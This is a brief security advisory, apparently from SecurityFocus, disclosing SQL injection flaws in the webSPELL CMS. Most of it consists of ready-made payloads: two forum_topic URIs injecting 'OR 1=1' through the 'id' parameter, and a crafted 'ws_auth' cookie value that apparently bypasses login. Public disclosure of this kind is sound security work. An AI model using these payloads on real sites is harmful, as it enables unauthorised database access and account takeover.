webSPELL Multiple SQL Injection Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/index.php?site=forum_topic&topic=[ID]&edit=true&id=1/**/%27/**/OR/**/1=1/*
http://www.example.com/index.php?site=forum_topic&topic=1&edit=true&id=1/**/%27/**/OR/**/1=1/*


The following example 'ws_auth' cookie value is available:

'1:'or/**/1=1/**/limit/**/0,1#


 

Privacy Statement
Copyright 2010, SecurityFocus